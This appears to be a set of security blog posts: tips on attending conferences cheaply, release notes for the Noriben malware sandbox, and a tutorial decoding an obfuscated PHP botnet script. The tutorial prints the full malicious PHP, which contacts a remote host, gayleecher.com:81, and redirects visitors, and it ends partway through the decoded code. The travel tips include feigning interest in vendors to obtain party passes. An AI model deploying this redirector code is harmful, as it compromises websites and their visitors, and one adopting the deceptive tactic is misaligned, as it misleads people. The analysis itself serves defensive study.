As the conference is off-site from the hotel, there is already driving involved. The conference is at the top-left marker and the con hotel is at the bottom-most marker. The rest are within the same area and a reasonable walk to the con hotel (for meeting with other attendees), with the exception of the one hotel off West Franklin (the Doubletree Hotel). However, as the Doubletree has the same star rating as our con hotel, there is a risk that we'll end up there. At a 12-block (0.8 mile) distance, the risk may be too high for some, who would then want to limit their bids to a lower star rating.

You may also want to scour other nearby Priceline regions. If the venue or con hotel is on the edge of your first region, it may be closer to hotels from a neighboring region.

Begin a Priceline bid and choose the selected region and highest star level that matches the con hotel. Find the "offensive" price by trying sequential low-ball prices in the dialog window ("Tab" out, but don't submit) until you find the lowest value that doesn't provide the bright red window below:


Our lowest non-offensive price is $30 for this star level and region for that time period. This price varies per date, so always check ahead of time. Anything within $10-15 of that value is likely to get rejected, so I start at $46. When faced with a rejected bid, you may have to reduce your star level or look to other regions. Each neighboring region moves our distance from less than a mile to about 8 miles away. I chose Richmond West, which has lower-end hotels. This eventually netted me a stay at a well-reviewed 2.5* hotel for $47/night.


Star Levels:

There are many pros and cons to various hotel star levels. As a personal rule, I tend to stay within the 2.5 to 3 star level range. Dropping to 2-star hotels often puts you into undesirable locations or very old and uncomfortable buildings. Anything higher than 3-star and you're being nickel and dimed for each and every expense. You don't want to blow your savings on $15/day Internet charges just to have the experience of a doorman.

The Priceline Upgrade:

Often times, the hotel you get may be an upgrade. While attending Derbycon 2012, I chose the Priceline route and was booked at the Galt House. While it was a four-block walk, there were indoor walkways connecting the hotels, and I had a great room that overlooked the Ohio River for $48/night.


Presenting Your Case:

The most important part is to provide your findings for approval. As many have found, simply asking to go to a conference will be met with quick rejection. As mentioned earlier, this needs to be pitched as a Risk Analysis. That requires that you build up a case for attending, and a case for not attending.

First off, find the schedule for the conference and note talks critical to your business infrastructure. Highlight these topics, taking special note of brand new topics or unique opportunities. Don't just show the topics, but put together an itinerary of which talks you will be attending for the entire stay, ensuring that there are no gaps. What you do when you arrive may vary, but you'll be presenting a solid case for a full work-day of training.

Leverage your certifications, such as the CISSP, which require continuing education "points". If your employer requires you to maintain a certification for contract bids or client work, then conference training should be presented as a way to ensure you maintain it.

Present a full budget for the trip, including hotel and transportation. Steer clear of requests for food, taxis, or car rentals; stick to the primary items. If you plan it well, you may not have to pay for those items once you arrive.

If you're finding little traction, be sure to emphasize the sacrifices that you're willing to make to attend. These could include using PTO, eating on your dime, or even paying for one night of hotel out of pocket.

Leverage your training budget, if you have one within your organization. There may be limitations on what this budget will cover, such as only the registration costs, but that does help lower the overall sticker-shock price of the trip.

And, overall, start small. Conference attendance is an exercise in trust between you and your employer. They want to see a return on their investment, but don't want to risk a large amount of money on that. By starting with small and inexpensive conferences, and continually showing your gained education and experience back to your organization, you'll pave a road for a greater budget.




Have additional ideas for saving money or convincing management to let you travel? Post them as a comment!

Coming Soon in Part Two:


How exactly do you show off your learned experience on your return to guarantee funding for your next trip?  How do you make a conference-friendly working environment to allow your coworkers to attend as well? How do you manage the day-to-day expenses while at the con? We'll cover those in Part Two of this post, coming soon.




Disclaimer: While these tricks can be used to travel as cheaply as possible, they should not be construed as an indication of a lack of training or expense reimbursement from my employer. I do have a training and conference budget, but my company is also an ESOP, so I go out of my way to ensure that I don't squander my training budget on unnecessary frills, allowing me to squeeze more conferences into the same budget.

Noriben Version 1.2 released

In a mad rush of programming while on a plane to BSidesNOLA, and during the conference, I completed a large number of updates, requests, and demands for Noriben.

As a basic malware analysis sandbox, Noriben was already doing a great job in helping people analyze malware more quickly and efficiently. However, it had its bugs that hurt a few outlier cases. Using submitted feedback (through email, Twitter, oral, and death threats) I believe that the major issues have been fixed and that the most-needed features have been added.

New Improvements:

  • Timeline support -- Noriben now automatically generates a "_timeline.csv" report that notes all activity in chronological order, with fields for local time and a grouping category. Feedback is welcome for ways to improve this output. For example:
8:16:19,Network,UDP Send,hehda.exe,2520,83.133.123.20:53
8:16:19,File,CreateFolder,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\L
8:16:19,File,CreateFolder,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\U
8:16:19,File,CreateFile,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\@,a7d89e4e5ae649d234e1c15da6281375
8:16:19,File,CreateFile,hehda.exe,2520,C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n,cfaddbb43ba973f8d15d7d2e50c63476
8:16:19,Registry,RegCreateKey,hehda.exe,2520,HKCU\Software\Classes\clsid
8:16:19,Registry,RegCreateKey,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}
8:16:19,Registry,RegCreateKey,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32
8:16:19,Registry,RegSetValue,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\ThreadingModel,Both
8:16:19,Registry,RegSetValue,hehda.exe,2520,HKCU\Software\Classes\CLSID\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InprocServer32\(Default),C:\RECYCLER\S-1-5-21-861567501-412668190-725345543-500\$fab110457830839344b58457ddd1f357\n.
8:16:19,Registry,RegDeleteValue,hehda.exe,2520,HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender
  • Tracks registry deletion attempts -- Older versions only tracked successful deletions to the registry, assuming that the keys and values existed. Now, it logs even when the keys don't exist. This opened up a large amount of data that was previously filtered out, such as ZeroAccess removing the services for Windows Defender and Microsoft Update (which weren't running on my analysis VM).
  • Large CSV support -- The old versions of Noriben read the entire procmon CSV into memory and then parsed it for results. This created numerous Out of Memory issues with very large sample files. The new version fixes this by only reading in the data one line at a time.
  • Parse Procmon PMLs -- PML files are the binary database used to store the native events during capture. These are converted to CSVs during runtime, but a number of users have years' worth of saved PMLs for previous malware samples. Now, Noriben can just parse an existing PML without having to re-run the malware.
  • Alternate Filter files -- Previous versions of Noriben required that you use one filter file, ProcmonConfiguration.PMC, to store your filters. This created issues for users who maintained multiple filters. A new command line option has been added to specify a filter file. This can be used in conjunction with the "-p" PML parsing option to rescan an existing PML with new filters.
  • Global Blacklists -- There was a need for a global blacklist, where items contained in it (namely executables) are applied across all of the individual blacklists. A blacklisted item no longer has to be manually added to each and every list.
  • Error Logging -- In a few unusual cases, Noriben fails to parse an event item from the CSV. While Noriben contains proper error handling to catch these issues, it just drops them and moves on. As these events may contain important items, they are now stored in raw at the end of the Noriben text report for manual analysis. If something looks amiss, and they are extremely important items, the list can be emailed to me for analysis and better handling in future versions.
  • Compartmentalized sections -- This is mostly a minor, back-end feature. All events are now grouped into separate lists for Process, File, Registry, and Network.
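
To make the line-at-a-time reading and the per-category grouping a bit more concrete, here is a minimal Python sketch. It is not Noriben's actual code: it assumes rows shaped like the timeline sample above (time, category, action, process, PID, detail) rather than the native Procmon CSV columns, and the function name `group_events` is made up for illustration.

```python
import csv
import io
from collections import defaultdict

# Two rows copied from the timeline sample above; a real run would open a file.
SAMPLE = (
    "8:16:19,Network,UDP Send,hehda.exe,2520,83.133.123.20:53\n"
    "8:16:19,Registry,RegCreateKey,hehda.exe,2520,HKCU\\Software\\Classes\\clsid\n"
)

def group_events(handle):
    """Read rows one at a time and bucket them by category (hypothetical helper)."""
    groups = defaultdict(list)
    for row in csv.reader(handle):    # the reader yields one row per iteration
        if len(row) < 5:
            continue                  # skip rows too short to hold the fixed fields
        time, category, action, process, pid = row[:5]
        detail = ",".join(row[5:])    # anything left over is treated as event detail
        groups[category].append((time, action, process, int(pid), detail))
    return groups

events = group_events(io.StringIO(SAMPLE))
print(sorted(events))
```

Because the reader is consumed inside the loop, only the current row and the grouped results are held in memory, never the whole input file.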

General fixes:

  • Changed "open file" command for Mac OS X to 'open'. OS X is tagged as 'posix'. This allows for Noriben to parse files from a Mac interface, but this is not recommended. Parsing files on a system other than the infected one means that system environment variables, such as %UserProfile%, will not be identified correctly.

Noriben has also changed its command line arguments, dropping the '-r' (rescan CSV) option and introducing more specific arguments for each file type: '-c' (CSV), '-p' (PML), and '-f' (filter):

--===[ Noriben v1.2 ]===--
--===[   @bbaskin   ]===--

usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [-d]

optional arguments:
  -h, --help                   show this help message and exit
  -c CSV, --csv CSV            Re-analyze an existing Noriben CSV file [input file]
  -p PML, --pml PML            Re-analyze an existing Noriben PML file [input file]
  -f FILTER, --filter FILTER   Alternate Procmon Filter PMC [input file]
  -d                           Enable debug tracebacks
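
For anyone scripting around these options, the usage text above maps onto a parser along the following lines. This is a sketch built with Python's argparse from the help output only, not a copy of Noriben's source; the `debug` attribute name and the file names `sample.PML` and `custom.PMC` are assumptions for illustration.

```python
import argparse

def build_parser():
    """Declare the four options listed in the v1.2 usage text."""
    parser = argparse.ArgumentParser(prog="Noriben.py")
    parser.add_argument("-c", "--csv",
                        help="Re-analyze an existing Noriben CSV file [input file]")
    parser.add_argument("-p", "--pml",
                        help="Re-analyze an existing Noriben PML file [input file]")
    parser.add_argument("-f", "--filter",
                        help="Alternate Procmon Filter PMC [input file]")
    parser.add_argument("-d", dest="debug", action="store_true",
                        help="Enable debug tracebacks")
    return parser

# Rescan a saved PML with a different filter file (both names are hypothetical).
args = build_parser().parse_args(["-p", "sample.PML", "-f", "custom.PMC"])
print(args.pml, args.filter, args.csv, args.debug)
```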

How to Attend Conferences On A Budget (Part Two)


In a previous post, we discussed how to build approval for attending a conference of your choice, based on using technology to find the best-priced venues and travel. This post is a follow-on that focuses on living within a budget while at a conference and what to do afterward to ensure that you can attend more in the future.


M&I/E (Meal and incidental expenses):
M&I/E typically applies only to those working in the public sector. It includes a daily meal per diem (directed by the OPM) and may also cover other required expenses such as tolls, parking, valet service, and bus/train fare. I find it easier to eat these costs than to try and push them on an employer. Ensure that you maintain receipts for any and all expenses during your trip. Even with a receipt threshold of $25, I was personally involved in a long battle over a $21 gas charge that I didn't keep a receipt for. Ten times that cost was spent on billable hours arguing over the charge, all of which could have been avoided by simply keeping the receipt.

Meals are an important consideration, and their cost varies by region. In Las Vegas, meals will eat a large portion of your budget, especially with alcohol charges. To offset this, try to crash every vendor party that you can find; many provide free food and drinks.

Know that a certain vendor is throwing a party? Hit their booth, sound extremely interested in their product... then take a fake phone call. Offer sorrow that you have to leave, and that you really wanted to ask them more questions, but that your schedule is full until day X and Y o'clock (the same time as the party). Many companies hold a few party passes back for potential customers, and they will likely forget your face by the next time you see them. While some may consider this social engineering, it's simply taking advantage of sales tactics. Worried about getting flooded by emails and sales calls? Make a new email address for yourself and print up your own set of business cards to hand out.

In many areas, such as Las Vegas, taxi costs will also eat up a large amount of your budget. For Vegas, I've found it sometimes easier to map out a route using shuttle buses. A quick walk to a neighboring casino could net you a seat on a shuttle to a sister casino that is a few blocks away from your destination. Additionally, when approaching a massive taxi line, there's no shame in going down the line to see if anyone is going to, or near, your destination. As a culture, Americans are hesitant to share, including cab rides, so if you find someone who is hesitant, steer them toward the cost savings and volunteer to pick up the tip. You'll still get to your destination cheaper, and faster. Additionally, it never hurts to make friends with someone there on business. This allows you to tag along on taxi rides that are just going to be expensed by someone else (but buy them a beer if this becomes common).




Note Taking and Building Content
The most critical process while attending conferences is to simply attend the talks, a step that many somehow forget. If you do find yourself actually in attendance at a talk, and hopefully one that you pitched to your management ahead of time, it is now somewhat critical to take notes on the talk. There are many ways in which this is done, depending on your style and typing speed.

A natural typist will have no problem transcribing each and every slide as they appear while following the conversation. Others may just focus on the high level points, while some just lean back with their eyes glazed and try to keep up. There is no problem with any of these approaches, nor with any person who exhibits these styles. Get what you can down on paper during the talk, and a little bit more between talks.

To make the best of your time, it's important to determine within the first few minutes if the slide deck can be made available to attendees afterward or not. If you can get your hands on the verbatim slide deck, then your note taking will be greatly reduced. Want to make sure? Ask the speaker before they start. Don't be an askhole and introduce yourself; just bark the question as they're setting up and wait for a yes/no answer. Larger conferences already have policies in place for sharing PowerPoint decks, and some (e.g. DEFCON) provide the slides on a DVD at registration well before the talk. But do your due diligence. Many times you see a PowerPoint file on the DVD and expect it to be complete, only to find that it's a simple one-slide placeholder. Don't fault the presenter; these decks are sometimes due months before the conference, while most development occurs in the hours, or minutes, before the actual talk.

Your note taking should complement the slides but also correlate back to your own work practices. The notes should contain excerpts from the talk mixed with situations from work where the processes could be applied.

Avoiding the Backpack
A typical view when walking around many conferences is that of backpacks. Heavy, lumbering, cloth bags containing massive amounts of electronics. Backpacks blocking pathways and adding another two feet of floor space to a group that's already known for being overweight. While it's tempting to bring along your 19" laptop to a talk to bang out notes on a full-size keyboard (which, honestly, I tend to do), pack lighter. Cheap Chromebooks and netbooks can be easily carried, and many Android tablets are the perfect size to fit within your pants pockets while being a fully functional tablet. My favorite fall back is the very inexpensive Nook Color, which has a web browser and notepad while fitting fully within my front pants pocket.


Miss a talk?
It happens. A talk you really wanted to attend, and you missed it. Maybe it was rescheduled, you couldn't get in to find a seat, you had to take a business/home phone call, or you slept through it. It's not the end of the world, and you can do your best to catch up. Try to find the presenter and acquire their slide deck. Hunt them on Twitter and try to buy them a few drinks in exchange for 15 minutes of conversation. Find others who sat through the talk and get their opinions and perspectives on it.


Training Back Brief
The most important part of the process is the Back Brief, a/k/a the After Action Report (AAR), a/k/a the information sharing. Want to ensure that you are chosen to attend other conferences? Then make sure that you bring back the con experience for others, sans alcohol.

Based on the size of your team, it's implausible that the entire team will be attending the same conference. The worst thing you can do is to take a week off to attend a conference, just to return and get back into your normal routine while telling stories of all the parties you attended. This helps no one and makes you look like a jerk.

Based on earlier advice, you should have taken copious notes during the presentation, or have possession of the slide deck with your notes. Now it's time to apply this to your environment. Let's explore these applications in terms of least effort to most.

  1. Provide verbatim slides to coworkers (inform) - The least amount of effort is to acquire the slide decks from the conference and provide them to your coworkers on a file share. While this quickly supplies the content to your team, it provides no additional context for sending you to the conference. Everyone on the team already has the ability to acquire most of these slides without spending $1000 and lost work time to send someone on-site.
    1. Video recordings fall into this same category. They capture your experience, but only from the perspective of the speaker. As more conferences record and store videos, or even live stream talks, the benefit of sitting in the audience holds less importance than it did in earlier years.
  2. Provide your raw notes to coworkers (inform) - Earlier, I suggested keeping live notes on talks as you view them. While these notes encapsulate the main topics of the talk, they may not be as clear and detailed to the reader as they are to the note-taker. They are best applied as context to a slide deck, or provided in a more fleshed out narrative style. But, they are useful for time sensitive topics.
  3. Provide briefings back to coworkers (inspire) - While this requires a penchant for public speaking, one of the most visible and effective methods of sharing information is to simply give the presentation again. Often, a one hour presentation can be reduced to simply 15-30 minutes when it is focused on your actual work processes, once all of the "scaffolding" to the talk is removed (speaker bio, why this is important, how we got here, etc). A tool presented at a conference? Run the tool against actual data from your environment and show off the results. Use it as a teaser to inspire others to take up the project and do more with it. 
  4. Update your work processes (empower) - The most difficult effort, but the most effective, is to use knowledge gained to reconstruct your processes and work flow to be better and more efficient. While your team may be good at forensics, a recent talk on Plaso, and further experimentation, may show that you would be able to close an examination faster by days. Instead of just providing a briefing, work the new information into formal Standard Operating Procedures. Update your internal wiki pages to note how to use the tool. Write automated front-end scripts to run the tools directly against data in your environment. Use conferences as a means to improve your day-to-day operations!

Back Brief Example:

In late 2006, I was invited to attend the first Microsoft Law Enforcement Technology (LE Tech) conference. The conference was put on to provide deep-dive forensic details on the new Microsoft products (Vista, Office 2007, etc) that were coming out a few months later, at a FOUO/LE Sensitive level. While I was at Microsoft Campus in Bellevue, senior management at my day client were having a retreat to discuss upcoming challenges and how to address them. During my 8-hour flight home, I was able to formalize my raw notes into an indexed Word document (with table of contents) and quickly sent them to the project lead upon landing. This 20-page Word document instantly became required reading for the retreat.

Upon returning to work, I immediately broke down the topics into six distinct portions: for example, Vista, DOCX file formats, UAC and its impact on forensics, etc. For each, I worked with two colleagues who attended with me to put together a basic PowerPoint slide deck based on the notes we took. We then scheduled and gave a weekly one-hour presentation on each topic. These "brown bag" sessions were well attended and were also recorded, with the videos hosted internally for others to view.

All told, it was a lot of work, but one that paid off. It not only helped me go to more conferences on the customer's dime, but also helped pave the way for others to attend similar conferences. It also set the bar of expectation: if you're going to a conference on the client's tab, you will be expected to share what you learned.


Keep the ball rolling:
The hardest part of this whole process is that of enduring to the end. It's easy to want to show off for the first few trips and design excellent training upon your return. Many people become lax over time, however, and start to take advantage of the privilege of a training budget. While your brief back from 2011 may have been ground breaking, what have you done lately?

By careful planning, price-conscious logistics booking, and a studious effort to take notes and share information with your coworkers, you should be able to break ground in an industry where employers may be hesitant to send you to training. Be mindful that the entire purpose is to provide a return on investment to your employer for sending you. 

How To: Static analysis of encoded PHP scripts

This week, Steve Ragan of CSO Online posted an article on a PHP-based botnet named by Arbor Networks as Fort Disco. As part of his analysis, Ragan posted an oddly obfuscated PHP script for others to tinker with, shown below:

<? $GLOBALS['_584730172_']=Array(base64_decode('ZXJy'.'b'.'3JfcmVw'.'b'.'3J0aW5n'),base64_decode('c'.'2V0X3RpbWV'.'fbGl'.'taXQ'.'='),base64_decode(''.'ZG'.'Vma'.'W'.'5l'),base64_decode(''.'ZGlyb'.'mFtZQ=='),base64_decode('ZGVm'.'aW5l'),base64_decode(''.'d'.'W5saW5r'),base64_decode('Zml'.'sZ'.'V9le'.'G'.'lzdHM='),base64_decode('dG91Y2'.'g='),base64_decode('aXNfd3J'.'p'.'dGFibGU='),base64_decode('dHJ'.'p'.'bQ=='),base64_decode('ZmlsZ'.'V9nZXRf'.'Y29udGVud'.'HM='),base64_decode('dW5s'.'aW5r'),base64_decode('Zm'.'lsZ'.'V9nZXRf'.'Y2'.'9u'.'dGVudHM='),base64_decode('d'.'W5'.'saW5r'),base64_decode('cH'.'JlZ19'.'tYX'.'Rj'.'aA=='),base64_decode('aW1wb'.'G9kZ'.'Q=='),base64_decode('cHJlZ19t'.'YXRja'.'A=='),base64_decode('a'.'W1w'.'bG9k'.'Z'.'Q=='),base64_decode('Zml'.'s'.'ZV'.'9nZXRfY'.'29'.'udGV'.'udH'.'M='),base64_decode('Z'.'m9w'.'ZW4='),base64_decode(''.'ZmxvY'.'2'.'s'.'='),base64_decode('ZnB1'.'dH'.'M='),base64_decode('Zmx'.'vY'.'2s'.'='),base64_decode('Zm'.'Nsb3'.'Nl'),base64_decode('Z'.'mlsZV9leG'.'lzdH'.'M='),base64_decode('dW5zZX'.'JpYWx'.'pemU='),base64_decode('Z'.'mlsZV9nZXRfY29udGVu'.'dHM='),base64_decode('dGlt'.'ZQ'.'='.'='),base64_decode('Zm'.'ls'.'Z'.'V9n'.'ZX'.'RfY29'.'ud'.'GVu'.'dHM='),base64_decode('d'.'GltZ'.'Q=='),base64_decode('Zm9w'.'ZW4='),base64_decode('Zmx'.'vY2s='),base64_decode(''.'ZnB1dHM='),base64_decode('c2VyaWFsaX'.'pl'),base64_decode('Zm'.'xvY2s='),base64_decode('ZmNsb'.'3N'.'l'),base64_decode('c'.'3Vic3Ry'),base64_decode(''.'a'.'GVhZGVy'),base64_decode('aGVhZGV'.'y'));?><? function _1348942592($i){$a=Array('aHR0cDovL2dheWxlZWNoZXIuY29tOjgx','cXdlMTIz','cXdlMTIz','MTIzcXdl','Uk9PVA==','Lw==','TE9H','b2xvbG8udHh0','L2lmcmFtZS50eHQ=','dGVzdA==','d29yaw==','Tk8gV09SSywgTk9UIEdFVCBVUkw=','Tk8gV09SSywgTk9UIFdSSVRJQkxF','YWFh','YWFh','YWFh','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','YmJi','YmJi','Y2Nj','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','TnVsbCBjb3VudCBvaw==','RVJST1IgbnVsbCBjb3VudCgo','SFRUUF9VU0VSX0FHRU5U','TVNJRQ==','RmlyZWZveA==','T3BlcmE=','V2luZG93cw==','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','Lw==','fA==','L2k=','SFRUUF9VU0VSX0FHRU5U','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','','U0NSSVBUX0ZJTEVOQU1F','LmNvdW50','dw==','L2lmcmFtZTIudHh0','aHR0cDovL3lhLnJ1Lw==','c2V0dGluZ3MuanNvbg==','c2V0dGluZ3MuanNvbg==','bGFzdA==','dXJs','bGFzdA==','dXJs','bGFzdA==','c2V0dGluZ3MuanNvbg==','dw==','dXJs','dXJs','aHR0cA==','aHR0cDovLw==','Lw==','SFRUUC8xLjEgNDA0IE5vdCBGb3VuZA==');return base64_decode($a[$i]);}?><?php $GLOBALS['_584730172_'][0](round(0));$GLOBALS['_584730172_'][1](round(0));$_0=_1348942592(0);if(isset($_GET[_1348942592(1)])AND$_GET[_1348942592(2)]==_1348942592(3)){$GLOBALS['_584730172_'][2](_1348942592(4),$GLOBALS['_584730172_'][3](__FILE__)._1348942592(5));$GLOBALS['_584730172_'][4](_1348942592(6),ROOT._1348942592(7));@$GLOBALS['_584730172_'][5](LOG);if(!$GLOBALS['_584730172_'][6](LOG)){@$GLOBALS['_584730172_'][7](LOG);if($GLOBALS['_584730172_'][8](LOG)AND$GLOBALS['_584730172_'][9]($GLOBALS['_584730172_'][10]($_0._1348942592(8)))==_1348942592(9)){@$GLOBALS['_584730172_'][11](LOG);echo _1348942592(10);}else{echo _1348942592(11);}}else{echo _1348942592(12);}exit;}if(isset($_GET[_1348942592(13)])AND$_GET[_1348942592(14)]==_1348942592(15)){$_1=$GLOBALS['_584730172_'][12]($_SERVER[_1348942592(16)]._1348942592(17));echo $_1;exit;}if(isset($_GET[_1348942592(18)])AND$_GET[_1348942592(19)]==_1348942592(20)){if($GLOBALS['_584730172_'][13]($_SERVER[_1348942592(21)]._1348942592(22))){echo _1348942592(23);}else{echo _1348942592(24);}exit;}if(!empty($_SERVER[_1348942592(25)])){$_2=array(_1348942592(26),_1348942592(27),_1348942592(28));$_3=array(_1348942592(29));if($GLOBALS['_584730172_'][14](_1348942592(30).$GLOBALS['_584730172_'][15](_1348942592(31),$_2)._1348942592(32),$_SERVER[_1348942592(33)])){if($GLOBALS['_584730172_'][16](_1348942592(34).$GLOBALS['_584730172_'][17](_1348942592(35),$_3)._1348942592(36),$_SERVER[_1348942592(37)])){$_4=@$GLOBALS['_584730172_'][18]($_SERVER[_1348942592(38)]._1348942592(39));if($_4==_1348942592(40)or$_4==false)$_4=round(0);$_5=@$GLOBALS['_584730172_'][19]($_SERVER[_1348942592(41)]._1348942592(42),_1348942592(43));@$GLOBALS['_584730172_'][20]($_5,LOCK_EX);@$GLOBALS['_584730172_'][21]($_5,$_4+round(0+1));@$GLOBALS['_584730172_'][22]($_5,LOCK_UN);@$GLOBALS['_584730172_'][23]($_5);$_6=$_0._1348942592(44);$_7=round(0+300);$_8=_1348942592(45);if(!$_6)exit();$_9=$GLOBALS['_584730172_'][24](_1348942592(46))?$GLOBALS['_584730172_'][25]($GLOBALS['_584730172_'][26](_1348942592(47))):array(_1348942592(48)=>round(0),_1348942592(49)=>$_8);if($_9[_1348942592(50)]<$GLOBALS['_584730172_'][27]()-$_7){if($_9[_1348942592(51)]=$GLOBALS['_584730172_'][28]($_6)){$_9[_1348942592(52)]=$GLOBALS['_584730172_'][29]();$_10=$GLOBALS['_584730172_'][30](_1348942592(53),_1348942592(54));$GLOBALS['_584730172_'][31]($_10,LOCK_EX);$GLOBALS['_584730172_'][32]($_10,$GLOBALS['_584730172_'][33]($_9));$GLOBALS['_584730172_'][34]($_10,LOCK_UN);$GLOBALS['_584730172_'][35]($_10);}}$_11=$_9[_1348942592(55)]?$_9[_1348942592(56)]:$_8;if($GLOBALS['_584730172_'][36]($_11,round(0),round(0+1+1+1+1))!=_1348942592(57))$_11=_1348942592(58).$_11._1348942592(59);$GLOBALS['_584730172_'][37]("Location: $_11");exit;}}}$GLOBALS['_584730172_'][38](_1348942592(60));?>

As a fan of obfuscation, this clearly piqued my interest. The initial question was what was contained within all of the Base64 sections, but let's examine this holistically. At a high level, there are three distinct sections to this code block, each of which can be identified as beginning with "<?".




The "<? $GLOBALS['_584730172_']" section creates an array of multiple Base64-encoded function values. As each item is called by the code, base64_decode will run on its value and return actual text. By hand picking a few of these to test, they all return known PHP function names:
base64_decode('ZXJy'.'b'.'3JfcmVw'.'b'.'3J0aW5n') resolves to "error_reporting"
base64_decode('c'.'2V0X3RpbWV'.'fbGl'.'taXQ'.'=') resolves to "set_time_limit"
The actual Base64 encoded values are further obfuscated by breaking up the string into multiple segments and rejoining them with the PHP "." concatenation operator. As many stateful inspection devices may block PHP that contains a call of "preg_match", bad guys will normally Base64 encode it. But, devices can also search for the Base64 values of bad calls. So, to avoid this, the obfuscator code (not seen here) will randomly break up the text into chunks that are difficult for an automated device to piece back together.
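
To see the chunking trick in isolation, here is a small Python sketch that rejoins the quoted pieces of the first two entries and decodes them. The helper name `decode_chunked` is made up for this example; the two inputs are copied from the script above. The last line shows why the splitting matters: a naive search for the unbroken Base64 form of "error_reporting" does not match the chunked text.

```python
import base64
import re

def decode_chunked(php_expr):
    """Join the quoted chunks of a PHP 'a'.'b' expression and Base64 decode it."""
    chunks = re.findall(r"'([^']*)'", php_expr)
    return base64.b64decode("".join(chunks)).decode("ascii")

first = "'ZXJy'.'b'.'3JfcmVw'.'b'.'3J0aW5n'"
second = "'c'.'2V0X3RpbWV'.'fbGl'.'taXQ'.'='"
print(decode_chunked(first))
print(decode_chunked(second))

# A signature for the unbroken Base64 string fails against the chunked form.
signature = base64.b64encode(b"error_reporting").decode("ascii")
print(signature in first)
```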

Knowing that the "$GLOBALS['_584730172_']" resolves function names, we can analyze it in code with context. "$GLOBALS['_584730172_'][0]" will extract the first function name from the array ("error_reporting") and execute it in-place. We know that we need to just replace these calls with their actual Base64 decoded values. This can be done manually, but we'll do it automatically later.

The second section of the code is a function:
<? function _1348942592($i){

This function is doing the same thing as the "$GLOBALS['_584730172_']", but in a different manner. When passed a number, the function finds its corresponding value in an array and Base64 decodes it. When looking through these we see that they're the string values associated with the code:
'aHR0cDovL2dheWxlZWNoZXIuY29tOjgx' resolves to "http://gayleecher.com:81"
'cXdlMTIz' resolves to "qwe123"

We see these strings substituted within the code as function calls like:
$_0=_1348942592(0);

Just as with the function names, we'll want to replace these calls with their respective strings in the code. 
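
As a quick illustration of that substitution on a small piece of the code, the sketch below uses a regular expression to swap each call for its decoded string. This is only one way to do it, shown on the first four table entries and the opening fragment of the code section; the names `TABLE` and `inline_strings` are made up for the example.

```python
import base64
import re

# First four entries of the string table, copied from the script above.
TABLE = ['aHR0cDovL2dheWxlZWNoZXIuY29tOjgx', 'cXdlMTIz', 'cXdlMTIz', 'MTIzcXdl']
strings = [base64.b64decode(item).decode("ascii") for item in TABLE]

def inline_strings(code):
    """Replace each _1348942592(N) call with the quoted string it would return."""
    def lookup(match):
        return "'" + strings[int(match.group(1))] + "'"
    return re.sub(r"_1348942592\((\d+)\)", lookup, code)

fragment = ("$_0=_1348942592(0);if(isset($_GET[_1348942592(1)])"
            "AND$_GET[_1348942592(2)]==_1348942592(3)){")
print(inline_strings(fragment))
```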

And, finally, that leaves us with the actual code itself. By itself, it's not possible to analyze this without the function names and strings. You could manually replace the calls with the appropriate values, but it could also be done automatically. While in a hotel for an incident response, and waiting for my colleagues to prepare for dinner, I whipped up a very ugly decoder in Python. I've taken the time to clean it up a bit, shown below:

import base64

script = """
<<script>>
"""

functions = []
strings = []

# Split the script into its three segments (functions, strings, code).
sections = script.split("<?")
function_section = sections[1]
string_section = sections[2]
code = "<?" + sections[3]

# Parse through each value, separated by base64_decode call.
for entry in function_section.split("base64_decode"):
    # Skip the initial entry as it contains no value.
    if "GLOBALS" in entry:
        continue
    # Remove the string concatenations
    entry = entry.replace("'.'", "")
    # Split on single quote to get the Base64 value contained within the quotes.
    function = entry.split("'")[1]
    # Append new function name into array (decoded to text so it can be
    # joined back into the code string).
    functions.append(base64.b64decode(function).decode())

for entry in string_section.split(","):
    entry = entry.split("'")[1]
    strings.append(base64.b64decode(entry).decode())

# Now start replacing function calls with true values. We split on the call to
# acquire each index number, then replace.
code_lines = code.split("$GLOBALS['_584730172_']")
for line_num in range(1, len(code_lines)):
    line = code_lines[line_num]
    # Ensure the index call, [x], is in the string before going on.
    if "[" not in line:
        continue
    # Extract the index number, pull the function from the array.
    codenum = line.split("[")[1].split("]")[0]
    func = functions[int(codenum)]
    # Recreate the array string and replace it in the code.
    s = "$GLOBALS['_584730172_'][%s]" % codenum
    code = code.replace(s, func)

# Now start replacing strings with true values.
code_lines = code.split("_1348942592")
for line_num in range(1, len(code_lines)):
    line = code_lines[line_num]
    if "(" not in line:
        continue
    codenum = line.split("(")[1].split(")")[0]
    string = strings[int(codenum)]
    s = "_1348942592(%s)" % codenum
    code = code.replace(s, "'" + string + "'")

# Print the final code.
print(code)

The resulting code has another slight level of obfuscation: no carriage returns or spacing. This is easily resolved by submitting the code to an online code cleaner, such as PHP Code Cleaner. This results in the original code which is much easier to analyze:


<?php
error_reporting(round(0));
set_time_limit(round(0));
$_0='http://gayleecher.com:81';

if(isset($_GET['qwe123']) AND $_GET['qwe123']=='123qwe'){
    define('ROOT',dirname(__FILE__).'/');
    define('LOG',ROOT.'ololo.txt');
    @unlink(LOG);

    if(!file_exists(LOG)){
        @touch(LOG);

        if(is_writable(LOG) AND trim(file_get_contents($_0.'/iframe.txt'))=='test'){
            @unlink(LOG);
            echo 'work';
        }else{
            echo 'NO WORK, NOT GET URL';
        }
    }
    else{
        echo 'NO WORK, NOT WRITIBLE';
    }
    exit;
}

if(isset($_GET['aaa']) AND $_GET['aaa']=='aaa'){
